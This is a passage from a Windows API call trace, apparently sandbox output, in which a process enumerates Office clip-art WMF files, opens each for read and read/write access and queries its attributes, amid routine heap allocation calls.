ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xda6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS01634_.WMF", cAlternateFileName="")) returned 1 [0103.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0103.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0103.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.529] AreFileApisANSI () returned 1 [0103.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0103.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.530] AreFileApisANSI () returned 1 [0103.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a6f8 [0103.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 69 [0103.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.530] GetFileType (hFile=0x33c) returned 0x1 [0103.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0103.530] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.530] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.531] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.531] CloseHandle (hObject=0x33c) returned 1 [0103.531] AreFileApisANSI () returned 1 [0103.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0103.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 69 [0103.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.531] GetFileType (hFile=0x33c) returned 0x1 [0103.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0103.531] CloseHandle (hObject=0x33c) returned 1 [0103.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.533] AreFileApisANSI () returned 1 [0103.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0103.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 69 [0103.533] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xda6)) returned 1 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0103.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.533] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3a94, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS01635_.WMF", cAlternateFileName="")) returned 1 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0103.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0103.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0103.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0103.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0103.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0103.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0103.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.534] AreFileApisANSI () returned 1 [0103.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0103.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.534] AreFileApisANSI () returned 1 [0103.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0103.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 69 [0103.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.652] GetFileType (hFile=0x27c) returned 0x1 [0103.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0103.652] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.652] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.652] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.652] CloseHandle (hObject=0x27c) returned 1 [0103.652] AreFileApisANSI () returned 1 [0103.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0103.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 69 [0103.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.653] GetFileType (hFile=0x27c) returned 0x1 [0103.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.653] CloseHandle (hObject=0x27c) returned 1 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0103.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.654] HeapFree (in: hHeap=0x20000, 